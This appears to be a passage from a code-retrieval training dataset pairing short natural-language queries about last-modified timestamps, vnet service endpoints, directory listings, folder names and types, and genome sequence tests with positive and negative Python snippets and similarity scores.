last_update = self.storage.last_update(self.feed)\n if not last_update or last_update < yesterday:\n last_update = yesterday\n return last_update", "def getModifiedDate(self, *args):\n return _libsbml.ModelHistory_getModifiedDate(self, *args)", "def get_last_time(self):\n \n return self._last", "def last_modified_at(self):\n return self.viztrail.last_modified_at", "def last_modified_at(self) -> str:\n return pulumi.get(self, \"last_modified_at\")", "def last_modified_at(self) -> str:\n return pulumi.get(self, \"last_modified_at\")", "def 
last_modified(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"last_modified\")", "def last(self) -> 'outputs.CommitmentPeriodResponse':\n return pulumi.get(self, \"last\")", "def last_updated(self):\n return self._last_updated", "def getLastUpdate():\n swDB = switchdb.DB()\n lastupdate = swDB.getLastUpdate()\n swDB.close()\n return lastupdate", "def last_modified(self) -> str:\n\t\tif not self._closed:\n\t\t\ttimestamp = self.ds.last_modified()\n\t\t\treturn timestamp\n\t\treturn None" ]
[ "0.7332252", "0.7219531", "0.71956813", "0.71701235", "0.71467483", "0.7004979", "0.69549567", "0.69372267", "0.69336087", "0.68705344", "0.68644184", "0.68644184", "0.6829638", "0.68113947", "0.67973435", "0.6780454", "0.67783314", "0.6749812", "0.67184407", "0.67096853", "0.66737", "0.6654765", "0.66333526", "0.6621378", "0.6621378", "0.6605566", "0.6584556", "0.6575649", "0.65624493", "0.6552003" ]
0.8572634
0
Whether to ignore a missing vnet service endpoint or not.
def ignore_missing_vnet_service_endpoint(self) -> Optional[bool]:
        return pulumi.get(self, "ignore_missing_vnet_service_endpoint")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def ignore_missing_v_net_service_endpoint(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"ignore_missing_v_net_service_endpoint\")", "def ignore_missing_service_endpoint(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"ignore_missing_service_endpoint\")", "def test_no_endpoint_ignore_service_type(self):\n self.assert_service_disabled(\n 'monitoring',\n \"Not in the list of requested service_types.\",\n # 'monitoring' absent from this list\n service_types={'compute', 'orchestration', 'bogus'},\n )", "def test_no_endpoint(self):\n self.os_fixture.v3_token.remove_service('monitoring')\n conn = self._get_conn()\n # Monasca is not in the service catalog\n self.assertRaises(\n ks_exc.catalog.EndpointNotFound, getattr, conn, 'monitoring'\n )", "def __init__(__self__, *,\n ignore_missing_v_net_service_endpoint: Optional[pulumi.Input[bool]] = None,\n subnet_id: Optional[pulumi.Input[str]] = None):\n if ignore_missing_v_net_service_endpoint is not None:\n pulumi.set(__self__, \"ignore_missing_v_net_service_endpoint\", ignore_missing_v_net_service_endpoint)\n if subnet_id is not None:\n pulumi.set(__self__, \"subnet_id\", subnet_id)", "def test_unknown_service(self):\n raise NotImplementedError # FIXME", "def test_no_such_conf_section_ignore_service_type(self):\n del self.oslo_config_dict['heat']\n self.assert_service_disabled(\n 'orchestration',\n \"Not in the list of requested service_types.\",\n # 'orchestration' absent from this list\n service_types=['compute'],\n )", "def endpoint_absent(name, region=None, profile=None, interface=None, **connection_args):\n ret = {\n \"name\": name,\n \"changes\": {},\n \"result\": True,\n \"comment\": 'Endpoint for service \"{}\"{} is already absent'.format(\n name,\n ', interface \"{}\",'.format(interface) if interface is not None else \"\",\n ),\n }\n\n # Check if service is present\n endpoint = __salt__[\"keystone.endpoint_get\"](\n name, region, profile=profile, interface=interface, **connection_args\n )\n if not endpoint:\n return ret\n else:\n if __opts__.get(\"test\"):\n ret[\"result\"] = None\n ret[\"comment\"] = 'Endpoint for service \"{}\" will be deleted'.format(name)\n return ret\n # Delete service\n __salt__[\"keystone.endpoint_delete\"](\n name, region, profile=profile, interface=interface, **connection_args\n )\n ret[\"comment\"] = 'Endpoint for service \"{}\"{} has been deleted'.format(\n name,\n ', interface \"{}\",'.format(interface) if interface is not None else \"\",\n )\n ret[\"changes\"][\"endpoint\"] = \"Deleted\"\n return ret", "def test_no_adapter_opts_ignore_service_type(self):\n self.oslo_config_dict['heat'] = None\n self.assert_service_disabled(\n 'orchestration',\n \"Not in the list of requested service_types.\",\n # 'orchestration' absent from this list\n service_types=['compute'],\n )", "def _remove_endpoint(self, endpoint):\n logger.debug('')\n with self._endpoint_lock:\n count = len(self._endpoints)\n self._endpoints = [e for e in self._endpoints if e != endpoint]\n return (count != len(self._endpoints))", "def validate_endpoint(cmd, namespace):\n n = namespace\n\n if not n.endpoint:\n n.endpoint = get_config_value(cmd, 'communication', 'endpoint', None)", "def test_get_virtual_service(self):\n pass", "def unrecognised_service(service_name):\n print('Service {} not (yet) supported.'.format(service_name))\n pass", "def test_missing_endpoint(self, req):\n req.side_effect = ks_exc.EndpointNotFound()\n self.client._get_resource_provider(self.context, \"fake\")\n\n # reset the call count to 
demonstrate that future calls still\n # work\n req.reset_mock()\n self.client._get_resource_provider(self.context, \"fake\")\n self.assertTrue(req.called)", "def test_unauthenticated_service_blocked(self):\n raise NotImplementedError # FIXME", "def default_vpc_endpoint_service_factory( # type: ignore[misc]\n service_region: str,\n zones: List[str],\n service: str = \"\",\n service_type: str = \"Interface\",\n private_dns_names: bool = True,\n special_service_name: str = \"\",\n policy_supported: bool = True,\n base_endpoint_dns_names: Optional[List[str]] = None,\n ) -> List[Dict[str, Any]]: # pylint: disable=too-many-arguments\n if special_service_name:\n service_name = f\"com.amazonaws.{service_region}.{special_service_name}\"\n else:\n service_name = f\"com.amazonaws.{service_region}.{service}\"\n\n if not base_endpoint_dns_names:\n base_endpoint_dns_names = [f\"{service}.{service_region}.vpce.amazonaws.com\"]\n\n endpoint_service = {\n \"AcceptanceRequired\": False,\n \"AvailabilityZones\": zones,\n \"BaseEndpointDnsNames\": base_endpoint_dns_names,\n \"ManagesVpcEndpoints\": False,\n \"Owner\": \"amazon\",\n \"ServiceId\": f\"vpce-svc-{BaseBackend.vpce_random_number()}\",\n \"ServiceName\": service_name,\n \"ServiceType\": [{\"ServiceType\": service_type}],\n \"Tags\": [],\n \"VpcEndpointPolicySupported\": policy_supported,\n }\n\n # Don't know how private DNS names are different, so for now just\n # one will be added.\n if private_dns_names:\n endpoint_service[\n \"PrivateDnsName\"\n ] = f\"{service}.{service_region}.amazonaws.com\"\n endpoint_service[\"PrivateDnsNameVerificationState\"] = \"verified\"\n endpoint_service[\"PrivateDnsNames\"] = [\n {\"PrivateDnsName\": f\"{service}.{service_region}.amazonaws.com\"}\n ]\n return [endpoint_service]", "def describe_endpoint(EndpointName=None):\n pass", "def test_route_with_upload_service_absent(self, mocker):\n client = wsgi.application.test_client(mocker)\n\n url = '/'\n\n response = client.get(url)\n\n output = {\n \"message\": \"upload-service not operational\",\n \"status\": \"Error\",\n \"version\": wsgi.VERSION\n }\n assert response.get_json() == output\n assert response.status_code == 500", "def test_unknown_resource_under_service(self):\n raise NotImplementedError # FIXME", "def test_egress_returns_envelope_unchanged():\n plugin_instance = PluginVipCustomisation()\n assert plugin_instance.egress('envelope', 'http_headers', 'operation', 'binding_options') == ('envelope', 'http_headers')", "def test_142_cinder_endpoint(self):\n u.log.debug('Checking cinder endpoint...')\n endpoints = self.keystone_v2.endpoints.list()\n admin_port = internal_port = public_port = '8776'\n expected = {\n 'id': u.not_null,\n 'region': 'RegionOne',\n 'adminurl': u.valid_url,\n 'internalurl': u.valid_url,\n 'publicurl': u.valid_url,\n 'service_id': u.not_null\n }\n\n ret = u.validate_endpoint_data(endpoints, admin_port, internal_port,\n public_port, expected)\n if ret:\n amulet.raise_status(amulet.FAIL,\n msg='cinder endpoint: {}'.format(ret))", "def default_vpc_endpoint_service(\n service_region: str, zones: List[str] # pylint: disable=unused-argument\n ) -> List[Dict[str, str]]:\n return []", "def enable_vnet_integration(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"enable_vnet_integration\")", "def valid_endpoint(cls):\n\t\treturn cls.__subclasses__() == []", "def test_virtualservice_get(self):\n pass", "def test_aws_service_api_interfaces_get(self):\n pass", "def validate_raw_endpoint(raw_endpoint: Dict[str, Any]) -> None:\n 
validate_raw_endpoint_route(raw_endpoint)\n validate_raw_endpoint_method(raw_endpoint)", "def get_neutron_endpoint(cls, json_resp):\n catalog = json_resp.get('token', {}).get('catalog', [])\n match = 'neutron'\n\n neutron_endpoint = None\n for entry in catalog:\n if entry['name'] == match or 'Networking' in entry['name']:\n valid_endpoints = {}\n for ep in entry['endpoints']:\n interface = ep.get('interface', '')\n if interface in ['public', 'internal']:\n valid_endpoints[interface] = ep['url']\n\n if valid_endpoints:\n # Favor public endpoints over internal\n neutron_endpoint = valid_endpoints.get(\"public\", valid_endpoints.get(\"internal\"))\n break\n else:\n raise MissingNeutronEndpoint()\n\n return neutron_endpoint", "def aggregator_unavailable_apiservice(self, metric, scraper_config):\n for sample in metric.samples:\n sample[self.SAMPLE_LABELS][\"apiservice_name\"] = sample[self.SAMPLE_LABELS].pop(\"name\")\n self.submit_metric('.aggregator_unavailable_apiservice', metric, scraper_config, monotonic_count=False)", "def test_basic_remove_endpoint(self):\n mac, ip = self.setup_with_endpoint()\n time.sleep(2)\n\n self.assertTrue(self.verify_remote_site_has_entry(mac, ip, 'intersite-testsuite', 'l3out',\n 'intersite-testsuite-app-epg1'))\n self.remove_endpoint(mac, ip, 'intersite-testsuite', 'app', 'epg1')\n self.assertFalse(self.verify_remote_site_has_entry(mac, ip, 'intersite-testsuite', 'l3out',\n 'intersite-testsuite-app-epg1'))" ]
[ "0.75127226", "0.666186", "0.65345496", "0.61584747", "0.5785869", "0.566079", "0.5657597", "0.5604734", "0.5506748", "0.54837817", "0.5482908", "0.53341347", "0.52935594", "0.52466923", "0.5243484", "0.52242935", "0.52234066", "0.52123487", "0.5211851", "0.5159619", "0.51533693", "0.51478946", "0.5140942", "0.51255417", "0.5115726", "0.51113915", "0.5089006", "0.50795656", "0.5076339", "0.5060741" ]
0.81507653
0
Return a list containing files in the current working directory
def get_all_files(cwd):
    return os.listdir(cwd)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def getFiles(self):\n\t\treturn os.listdir(self.getPath())", "def get_my_files():\n return [file for file in os.listdir(os.getcwd()) if os.path.isfile(file)]", "def files_in_dir(path):\n return os.listdir(path)", "def list_files(path):\n ls_output = os.listdir(path)\n return ls_output", "def get_list_of_files_in_dir(file_list_path=None):\n return os.listdir(file_list_path)", "def get_files(self) -> list:\n files = []\n for file in os.listdir(self.root):\n if file.endswith(f\".{self.suffix}\"):\n files.append(os.path.join(self.root, file))\n return files", "def get_files(self):\r\n return self._filelist", "def file_list(start_dir):\n file_list = []\n for root, dirs, files in os.walk(start_dir):\n for f in files:\n if f[0] != '.':\n file_list.append(f)\n return file_list", "def get_files(self) -> tp.Iterable[str]:\n return os.listdir(self.path)", "def files_list(directory: str) -> list:\n files = os.listdir(directory)\n\n return files", "def get_file_list(path: str) -> list:\n\treturn [f for f in listdir(path) if isfile(join(path, f))]", "def listFiles(self):\n pass", "def get_all_files(self):\n\t\tfiles_list = []\n\t\tfor path, subdirs, files in os.walk(self.root):\n\t\t for name in files:\n\t\t \tfiles_list.append(os.path.join(self.root, name))\n\t\treturn files_list[0:-1]", "def scandir(path_):\n return os.listdir", "def retrieve_all_files(self):\n result = utilities.rscandir(\n self.folder(), ignore_dirs=[\".git\"])\n\n return result", "def getAllFiles(self):\n\n\t\treturn self.getFilesForDirs([])", "def lsFiles(ruta = getcwd()):\r\n files = [arch.name for arch in scandir(ruta) if arch.is_file()]\r\n return files", "def find_all_files(self):\n look4files = [ f for f in listdir(self.file_location) if isfile(join(self.file_location,f)) ]\n return look4files", "def retrieve_tracked_files(self):\n result = []\n\n for key in self.repo.index.entries.keys():\n\n result.append(os.path.join(self.repo.working_dir, key[0]))\n\n return result", "def get_file_list(input_dir):\n\tfile_paths = [input_dir +'/' + f for f in listdir(input_dir) if isfile(join(input_dir, f)) ]\n\treturn file_paths", "def listdir(self, path):\n return os.listdir(path)", "def files(self):\n self._printer('\\tFiles Walk')\n for directory in self.directory:\n for path in os.listdir(directory):\n full_path = os.path.join(directory, path)\n if os.path.isfile(full_path):\n if not path.startswith('.'):\n self.filepaths.append(full_path)\n return self._get_filepaths()", "def _get_files(self):\n # pylint: disable=unused-variable\n for dirpath, __, filenames in os.walk(self.start_location):\n for file_ in filenames:\n if file_.endswith('.py'):\n yield \"{0}{1}\".format(dirpath, file_)", "def list_dir(self, path):", "def get_files(self, dir):\n path = os.path.join(self.loc, dir)\n return [f for f in os.listdir(path)\n if os.path.isfile(os.path.join(path, f))]", "def list(self):\n\n if self.isdir():\n from os import listdir\n\n return [u for e in listdir(self.fspath) for u in self.join(e).list()]\n\n else:\n return [self]", "def lists(path):\r\n return os.listdir(path)", "def listfiles(self, *path):\n dir = self.localpath(*path)\n files = []\n for root, dirs, fnms in os.walk(dir):\n for f in fnms:\n if f[-5:] == '.info' and os.path.exists(os.path.join(root, f[:-5])):\n try:\n _open_file_info(os.path.join(root, f))\n files.append(\n path + tuple(_split_path(\n os.path.relpath(os.path.join(root, f[:-5]), start=dir)\n )))\n except ValueError:\n pass\n return files", "def get_file_list(self):\n try:\n for filename in 
os.listdir(SHARED_DIR):\n self.file_list.append(filename)\n except Exception as e:\n print \"Error: retriving file list, %s\" % e", "def _list_dir(self):\n return [os.path.join(self.cache_dir, fn)\n for fn in os.listdir(self.cache_dir)]" ]
[ "0.8243705", "0.7986272", "0.78300756", "0.7797188", "0.77566135", "0.7747943", "0.7612247", "0.75997365", "0.75865906", "0.7568702", "0.7565383", "0.754392", "0.74458206", "0.74326265", "0.7400026", "0.73980325", "0.738138", "0.7292439", "0.7267739", "0.7262558", "0.72419256", "0.72250676", "0.72073245", "0.7192978", "0.7182596", "0.7176294", "0.7173945", "0.71463805", "0.7134495", "0.71134394" ]
0.82731485
0
Return a list of folder names
def folder_name(self):
    folders = []
    for folder in self.folders:
        folders.append(folder)
    return folders
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_folder_list(args):\n\tif not args.folders:\n\t\treturn None\n\n\tif os.path.isfile(args.folders):\n\t\treturn [x.strip() for x in list(open(args.folders, 'r'))]\n\n\telse:\n\t\treturn [x.strip() for x in args.folders.split(',')]", "def get_list_of_folders(self, end_of_folder_name):\n folder_list = [os.path.basename(f) for f in glob.glob(os.path.join(self.parent_folder, end_of_folder_name))]\n folder_list.sort()\n return folder_list", "def listImageFolderString():\n return ' '.join(map('\"{}\"'.format, listImageFolder()))", "def listFolders(folderRoot):\n return os.listdir(folderRoot)", "def get_folder_list():\n if exists_key_store('folders:list'):\n return get_key_store('folders:list')\n else:\n # initialize folder list with root (All)\n set_key_store('folders:counter', 0)\n rpush_key_store('folders:list', {'id': 0, 'parent': -1, 'name': 'All'})\n return get_key_store('folders:list')", "def root_directory_list(self) -> str:\n return self.__root_directory_list", "def list_dir(self, path):", "def owncloud_folder_list(node_addon, user_addon, **kwargs):\n path = request.args.get('path')\n return node_addon.get_folders(path=path)", "def ListFolder(self, path): # real signature unknown; restored from __doc__\n pass", "def listdirs(self):\n return self.list_groups()", "def build_folder_names(result: Dict[str, Any], folder_name: str = \"\") -> List[Any]:\n folder_name = \"/\".join((folder_name, result.get(\"name\", \"\"))).replace(\"//\", \"/\")\n folders = [folder_name]\n if not result.get(\"children\"):\n return folders\n\n for child in result[\"children\"]:\n folders.extend(build_folder_names(child, folder_name))\n\n return folders", "def lsFolders(ruta = getcwd()):\r\n folders = [arch.name for arch in scandir(ruta) if arch.is_file() == False]\r\n return folders", "def list_dirs(self):\n return self.list_groups()", "def list_folders(path):\n return (name for name in os.listdir(path)\n if os.path.isdir(os.path.join(path, name)))", "def created_names(self, prefix):\n assert os.path.isdir(prefix)\n cwd = os.getcwd()\n os.chdir(prefix)\n names = tuple(sorted(filter(\n os.path.isdir,\n glob.glob(os.path.join(*('*' * self.depth))))))\n os.chdir(cwd)\n return names", "def getFolderPath(self) -> unicode:\n ...", "def dir_list_folder(head_dir, dir_name):\n dirList = []\n for fn in os.listdir(head_dir):\n dirfile = os.path.join(head_dir, fn)\n if os.path.isdir(dirfile):\n if fn.upper() == dir_name.upper():\n dirList.append(dirfile)\n else:\n dirList += dir_list_folder(dirfile, dir_name)\n if dirList != []:\n break\n return dirList", "def list_folders_into_directory(directory_path: str) -> [str]:\n for root, directory_names, file_names in walk(directory_path):\n return directory_names", "def folder(fpath):\n file_paths = glob.glob(fpath + '/*.dat')\n return list(file_paths)", "def get_folder_list(self, folders: List[str]) -> List[str]:\n if self.current_folder != Path(self.current_folder.parts[0]):\n return [self.PARENT, *(sorted(folders))]\n return sorted(folders)", "def get_directory_list(self):\r\n lines = []\r\n self.ftp.retrlines('LIST', lines.append)\r\n return lines", "def get_child_folder_names(folder_path):\n folder_names_in_folder = []\n try:\n for f in listdir(folder_path):\n if '__pycache__' not in f and isdir(\"%s/%s\" %(folder_path,f)):\n folder_names_in_folder.append(f)\n except OSError as e:\n # error\n print(\"ERROR IN get_child_folder_names\")\n\n return folder_names_in_folder", "def listdir(self, path: bytes) -> List[bytes]:\n directories, files = 
self.storage.listdir(path.decode())\n return (\n [b\".\", b\"..\"]\n + [name.encode() for name in directories if name]\n + [name.encode() for name in files if name]\n )", "def retrieve_folders(dir):\n print(dir)\n items = os.listdir(dir)\n folders = []\n for item in items:\n print(item )\n if os.path.isdir(dir+'/'+item):\t\t\t#what means of preconditions in if \n folders.append(dir+'/'+item) \n return folders", "def get_dirnames(path):\n storage = DefaultStorage()\n dirnames = storage.listdir(path)[0]\n dirnames.sort()\n return dirnames", "def get_folder_filenames(folder_path: str) -> list:\n\n folder_path = 'images/right'\n folder_file_list = os.listdir(folder_path)\n folder_file_list.sort()\n\n return folder_file_list", "def list_files_in_given_folder(path_to_folder):\r\n file_names_list = []\r\n for file_name in glob.glob(path_to_folder+\"/*\"):\r\n file_names_list.append(file_name)\r\n assert file_names_list != [], \"failed to populate folder\"+path_to_folder\r\n return file_names_list", "def listdir(self, path):\n return os.listdir(path)", "def folder_type(self):\n types = []\n for type in self.folders_type:\n types.append(type)\n return types", "def listdir(self, subdir=''):\n\n try:\n subdir = subdir.decode()\n except AttributeError:\n pass\n subdir = subdir.rstrip('\\\\')\n # cmd = '\"%s\" \"%s\" 0 ' % (self.ndc_path, self.filename)\n cmd = [\n self.ndc_path,\n self.filename,\n '0'\n ]\n if subdir:\n cmd.append(subdir)\n # cmd += '\"%s\"' % subdir\n\n logging.info(cmd)\n try:\n result = check_output(cmd)\n except CalledProcessError:\n raise FileNotFoundError('Subdirectory not found in disk', [])\n\n result = [r.split(b'\\t') for r in result.split(b'\\r\\n')]\n result = list(filter(lambda x: len(x) == 4, result))\n\n filenames = []\n subdirs = []\n for r in result:\n try:\n decoded = r[0].decode('shift_jis')\n if r[2] != b'<DIR>':\n filenames.append(decoded)\n elif r[2] == b'<DIR>' and len(r[0].strip(b'.')) > 0:\n subdirs.append(decoded)\n except UnicodeDecodeError:\n logging.info(\"Couldn't decode one of the strings in the folder: %s\" % subdir)\n continue\n\n return filenames, subdirs" ]
[ "0.76186156", "0.7430843", "0.73491526", "0.73406965", "0.71975374", "0.71707374", "0.7130499", "0.7100979", "0.70779717", "0.70659024", "0.7000448", "0.6987247", "0.69868743", "0.696074", "0.683982", "0.68326867", "0.682668", "0.68047774", "0.67565644", "0.6719934", "0.67135453", "0.6704412", "0.6697293", "0.666592", "0.6663378", "0.66507596", "0.6649529", "0.66489524", "0.66041505", "0.65931225" ]
0.863706
0
Return a list of folder types
def folder_type(self):
    types = []
    for type in self.folders_type:
        types.append(type)
    return types
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_folder_files(folder, types):\n files_grabed = []\n for file_type in types:\n files_grabed.extend(glob.glob(os.path.join(folder, file_type)))\n return files_grabed", "def folder_name(self): \n folders = []\n for folder in self.folders:\n folders.append(folder)\n return folders", "def list_dirs(roo_tpath, file_types):\n\n folders = []\n\n for root, dirs, files in os.walk(roo_tpath, followlinks=True):\n for f in files:\n if os.path.splitext(f)[1].lower() in file_types:\n folders += [os.path.relpath(root, roo_tpath)]\n break\n\n return folders", "def get_directories_containing_filetype(self, filetype):\n len_suffix = len(filetype)\n self.get_directories_containing_filetype_loop(self, self.dirpath, filetype, len_suffix)\n return", "def lsFolders(ruta = getcwd()):\r\n folders = [arch.name for arch in scandir(ruta) if arch.is_file() == False]\r\n return folders", "def get_folder_list(args):\n\tif not args.folders:\n\t\treturn None\n\n\tif os.path.isfile(args.folders):\n\t\treturn [x.strip() for x in list(open(args.folders, 'r'))]\n\n\telse:\n\t\treturn [x.strip() for x in args.folders.split(',')]", "def listFolders(folderRoot):\n return os.listdir(folderRoot)", "def retrieve_folders(dir):\n print(dir)\n items = os.listdir(dir)\n folders = []\n for item in items:\n print(item )\n if os.path.isdir(dir+'/'+item):\t\t\t#what means of preconditions in if \n folders.append(dir+'/'+item) \n return folders", "def get_folder_list():\n if exists_key_store('folders:list'):\n return get_key_store('folders:list')\n else:\n # initialize folder list with root (All)\n set_key_store('folders:counter', 0)\n rpush_key_store('folders:list', {'id': 0, 'parent': -1, 'name': 'All'})\n return get_key_store('folders:list')", "def ListFolder(self, path): # real signature unknown; restored from __doc__\n pass", "def list_type_in_dir(path, extension):\n path, extension = check_args(path, extension)\n files = os.listdir(path)\n file_list = [os.path.join(path, f)\n for f in fnmatch.filter(files, '*' + extension)]\n\n return file_list", "def list_folders(path):\n return (name for name in os.listdir(path)\n if os.path.isdir(os.path.join(path, name)))", "def list_dir(self, path):", "def list_folder(self, c_folder_or_c_path):\n raise NotImplementedError", "def get_file_list(self, file_type='.pkl'):\n # Note (Somil): Since we moved from a string to a list convention for data directories, we are adding\n # additional code here to make sure it is backwards compatible.\n if isinstance(self.p.data_creation.data_dir, str):\n self.p.data_creation.data_dir = [self.p.data_creation.data_dir]\n \n file_list = []\n for i in range(len(self.p.data_creation.data_dir)):\n file_list.extend([os.path.join(self.p.data_creation.data_dir[i], f)\n for f in os.listdir(self.p.data_creation.data_dir[i]) if f.endswith(file_type)])\n return file_list", "def get_list_of_folders(self, end_of_folder_name):\n folder_list = [os.path.basename(f) for f in glob.glob(os.path.join(self.parent_folder, end_of_folder_name))]\n folder_list.sort()\n return folder_list", "def list_dirs(self):\n return self.list_groups()", "def testTypeDescendants(self):\n\n cmisClient = CmisClient(self.url, self.user, self.pwd,\n binding=self.binding,\n **self.ext_args)\n repo = cmisClient.getDefaultRepository()\n typeDefs = repo.getTypeDescendants()\n folderDef = None\n for typeDef in typeDefs:\n if typeDef.getTypeId() == 'cmis:folder':\n folderDef = typeDef\n break\n assert folderDef\n assert folderDef.baseId", "def getNotAddableTypes(self):\n rota_tool = getToolByName(self, 
'portal_rotatool')\n if (self.contentValues(filter={'portal_type': 'RotaFolder'}) or\n (not rota_tool.getReportingLeadTime()) or\n (not rota_tool.getTakeLength()) or\n (not rota_tool.getExtraTakes()) or\n (not rota_tool.getAvailableReporters())\n ):\n return ['RotaFolder', ]\n return []", "def owncloud_folder_list(node_addon, user_addon, **kwargs):\n path = request.args.get('path')\n return node_addon.get_folders(path=path)", "def create_all_folders_query():\n qry_text = \"<Where><Eq><FieldRef Name=\\\"FSObjType\\\" /><Value Type=\\\"Integer\\\">1</Value></Eq></Where>\"\n return CamlQuery.parse(qry_text, ViewScope.RecursiveAll)", "def listdirs(self):\n return self.list_groups()", "def list_dir(self):\n x = [x for x in os.listdir(self.spath) if os.path.isdir(os.path.join(self.spath, x))]\n if x != [] :\n print (f\"choose one of these : {x}\")", "def get_list_of_files(directory: str, file_type: str) -> list:\n ret = []\n for (root, subdirectories, files) in os.walk(directory):\n for file in files:\n if file.endswith(file_type):\n ret.append(os.path.abspath(os.path.join(root, file)))\n return ret", "def get_path_list(self, type_str=None):\n return list(\n reversed(\n [v.label_str for v in self.parent_gen if type_str in (None, v.type_str)]\n )\n )", "def search_zip(folder: Path, file_type: str) -> list[Path]:\n result = []\n for folder_item in folder.iterdir():\n # Is it a directory?\n if folder_item.is_dir():\n result.extend(search_zip(folder_item, file_type))\n # Is it a file?\n if folder_item.is_file():\n if folder_item.name.endswith(file_type):\n result.append(folder_item)\n return result", "def _listTypesForInterface(portal, interface):\n archetype_tool = getToolByName(portal, 'archetype_tool')\n portal_types = getToolByName(portal, 'portal_types')\n utranslate = portal.utranslate\n types = archetype_tool.listPortalTypesWithInterfaces([interface])\n all_types = [tipe.getId() for tipe in types]\n # fix for bug in listPortalTypesWithInterfaces which returns 2 'ATFolder'\n # when asking for IBaseFolder interface\n unik_types = dict.fromkeys(all_types).keys()\n return [_infoDictForType(tipe, portal_types, utranslate)\n for tipe in unik_types]", "def get_folder_list(self, folders: List[str]) -> List[str]:\n if self.current_folder != Path(self.current_folder.parts[0]):\n return [self.PARENT, *(sorted(folders))]\n return sorted(folders)", "def ntypes(self): # -> list[str]:\n ...", "def getTypesList():\n return Gw2Spidy._request('types')['results']" ]
[ "0.7214165", "0.6907222", "0.6847481", "0.65982836", "0.65898377", "0.6582917", "0.6539961", "0.64663464", "0.64614886", "0.6460519", "0.6443383", "0.64318335", "0.6402228", "0.63659465", "0.632687", "0.63254786", "0.62755585", "0.6269897", "0.6251558", "0.6250081", "0.62454957", "0.62414354", "0.6204248", "0.620233", "0.61914116", "0.6180529", "0.6076346", "0.60192513", "0.5995318", "0.59783727" ]
0.8790956
0
Test the ability to gather sequences
def testGetSequence():
    #a few of hand-tested genome positions
    test_data = [
        ('1',500,520,'GTCTGACCTGAGGAGAACTGT'),
        ('2',500,520,'CCCGACCCCGACCCCGACCCA'),
        ('3',50000,50020,'TCTTCTTTTATGAAAAAGGAT'),
        ('4',50000,50020,'AGAGCCCTGCAATTTGAAGAT'),
        ('5',100000,100020,'AATGTTCACCAGTATATTTTA'),
        ('X',100000,100020,'TAGGTCTCATTGAGGACAGAT'),
        ('Y',100000,100020,'TAGGTCTCATTGAGGACAGAT')]
    for this_check in test_data:
        yield CheckGetSequence, this_check
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_input_type_seq(self, _run_mock):\n hhblits = self.tool(input_type=hhsuite.QueryType.SEQUENCE)\n self.assertEqual(set(hhblits.REQUIRED), set([\"name\", \"sequence\"]))\n hhblits.run({\"sequence\": self.SEQUENCE, \"name\": self.SEQ_NAME})\n self.verify_common(\"hhblits\", hhblits)\n\n _, kw_args = hhblits.tool.call_args\n self.assertIn(\"input\", kw_args[\"options\"])", "def test_sequence(self, output, input_):\n input_ = \"\\n\".join(input_)\n g = Genes(input_)\n s = Sequence(genes=g, ages=g.size)\n s.run()\n self.assertEquals(s.population.get_survivor(Sequence.IMPOSSIBLE),\n output)", "def test_sequences(self):\n self.assertEqual(self.t.get_mrna(self.chrom_seq), self.transcript_seq)\n self.assertEqual(self.t.get_cds(self.chrom_seq), self.cds_seq)\n self.assertEqual(self.t.get_protein_sequence(self.chrom_seq), self.amino_acid)\n self.assertEqual(self.t.get_intron_sequences(self.chrom_seq), self.introns)", "def test_sequences(self):\n self.assertEqual(self.t.get_mrna(self.chrom_seq), self.transcript_seq)\n self.assertEqual(self.t.get_cds(self.chrom_seq), self.cds_seq)\n self.assertEqual(self.t.get_protein_sequence(self.chrom_seq), self.amino_acid)\n self.assertEqual(self.t.get_intron_sequences(self.chrom_seq), self.introns)", "def test_sequences(self):\n self.assertEqual(self.t.get_mrna(self.chrom_seq), self.transcript_seq)\n self.assertEqual(self.t.get_cds(self.chrom_seq), self.cds_seq)\n self.assertEqual(self.t.get_protein_sequence(self.chrom_seq), self.amino_acid)\n self.assertEqual(self.t.get_intron_sequences(self.chrom_seq), self.introns)", "def test_sequences(self):\n self.assertEqual(self.t.get_mrna(self.chrom_seq), self.transcript_seq)\n self.assertEqual(self.t.get_cds(self.chrom_seq), self.cds_seq)\n self.assertEqual(self.t.get_protein_sequence(self.chrom_seq), self.amino_acid)\n self.assertEqual(self.t.get_intron_sequences(self.chrom_seq), self.introns)", "def test_sequences(self):\n self.assertEqual(self.t.get_mrna(self.chrom_seq), self.transcript_seq)\n self.assertEqual(self.t.get_cds(self.chrom_seq), self.cds_seq)\n self.assertEqual(self.t.get_protein_sequence(self.chrom_seq), self.amino_acid)\n self.assertEqual(self.t.get_intron_sequences(self.chrom_seq), self.introns)", "def test_sequences(self):\n self.assertEqual(self.t.get_mrna(self.chrom_seq), self.transcript_seq)\n self.assertEqual(self.t.get_cds(self.chrom_seq), self.cds_seq)\n self.assertEqual(self.t.get_protein_sequence(self.chrom_seq), self.amino_acid)\n self.assertEqual(self.t.get_intron_sequences(self.chrom_seq), self.introns)", "def test_sequences(self):\n self.assertEqual(self.t.get_mrna(self.chrom_seq), self.transcript_seq)\n self.assertEqual(self.t.get_cds(self.chrom_seq), self.cds_seq)\n self.assertEqual(self.t.get_protein_sequence(self.chrom_seq), self.amino_acid)\n self.assertEqual(self.t.get_intron_sequences(self.chrom_seq), self.introns)", "def test_sequences(self):\n self.assertEqual(self.t.get_mrna(self.chrom_seq), self.transcript_seq)\n self.assertEqual(self.t.get_cds(self.chrom_seq), self.cds_seq)\n self.assertEqual(self.t.get_protein_sequence(self.chrom_seq), self.amino_acid)\n self.assertEqual(self.t.get_intron_sequences(self.chrom_seq), self.introns)", "def test_sequences(self):\n self.assertEqual(self.t.get_mrna(self.chrom_seq), self.transcript_seq)\n self.assertEqual(self.t.get_cds(self.chrom_seq), self.cds_seq)\n self.assertEqual(self.t.get_protein_sequence(self.chrom_seq), self.amino_acid)\n self.assertEqual(self.t.get_intron_sequences(self.chrom_seq), self.introns)", "def 
